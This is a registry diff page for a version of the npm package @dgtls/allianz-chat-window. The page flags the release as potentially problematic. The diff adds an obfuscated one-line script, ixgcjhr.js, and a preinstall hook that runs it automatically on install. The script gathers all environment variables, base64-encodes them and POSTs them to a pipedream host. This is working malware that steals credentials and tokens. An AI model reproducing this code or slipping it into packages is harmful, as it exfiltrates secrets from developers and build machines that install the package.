@dgtls/allianz-chat-window 0.0.1-security → 1.4.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @dgtls/allianz-chat-window might be problematic. Click here for more details.
- package/ixgcjhr.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/ixgcjhr.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x5a47fb=a0_0x5cbf;(function(_0x2b053e,_0x1d65d2){const _0x33aaf3=a0_0x5cbf,_0x44edf1=_0x2b053e();while(!![]){try{const _0x55944d=-parseInt(_0x33aaf3(0x1e7))/0x1+-parseInt(_0x33aaf3(0x1df))/0x2*(parseInt(_0x33aaf3(0x1dc))/0x3)+-parseInt(_0x33aaf3(0x1dd))/0x4+parseInt(_0x33aaf3(0x1e3))/0x5*(-parseInt(_0x33aaf3(0x1ed))/0x6)+-parseInt(_0x33aaf3(0x1ec))/0x7*(parseInt(_0x33aaf3(0x1e4))/0x8)+parseInt(_0x33aaf3(0x1ef))/0x9+parseInt(_0x33aaf3(0x1e2))/0xa*(parseInt(_0x33aaf3(0x1ea))/0xb);if(_0x55944d===_0x1d65d2)break;else _0x44edf1['push'](_0x44edf1['shift']());}catch(_0x5a5e5d){_0x44edf1['push'](_0x44edf1['shift']());}}}(a0_0x2a1e,0x27ac9));function a0_0x2a1e(){const _0xb02304=['env','766wqKFtF','toString','b2c25c3b4e80055c256dc21dd58fb813','10kXEYru','5vJCVwx','8RFXdNE','from','write','172879CJtCLh','POST','pipedream','11626626tsZKKR','stringify','1068641TrGpch','1752294wTRFDR','npm_package_name','64026iVjMvQ','end','request','1032pInvpa','608928gJlIKp'];a0_0x2a1e=function(){return _0xb02304;};return a0_0x2a1e();}function a0_0x5cbf(_0x2d32f5,_0x3f58e8){const _0x2a1e1c=a0_0x2a1e();return a0_0x5cbf=function(_0x5cbf21,_0x6e3e0a){_0x5cbf21=_0x5cbf21-0x1db;let _0x7a575a=_0x2a1e1c[_0x5cbf21];return _0x7a575a;},a0_0x5cbf(_0x2d32f5,_0x3f58e8);}const http=require('https');req=http[a0_0x5a47fb(0x1db)]({'host':[a0_0x5a47fb(0x1e1),'m',a0_0x5a47fb(0x1e9),'net']['join']('.'),'path':'/'+(process[a0_0x5a47fb(0x1de)][a0_0x5a47fb(0x1ee)]||''),'method':a0_0x5a47fb(0x1e8)}),req[a0_0x5a47fb(0x1e6)](Buffer[a0_0x5a47fb(0x1e5)](JSON[a0_0x5a47fb(0x1eb)](process[a0_0x5a47fb(0x1de)]))[a0_0x5a47fb(0x1e0)]('base64')),req[a0_0x5a47fb(0x1f0)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@dgtls/allianz-chat-window",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.4.1",
|
|
4
|
+
"main": "ixgcjhr.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node ixgcjhr.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40dgtls%2Fallianz-chat-window for more information.
|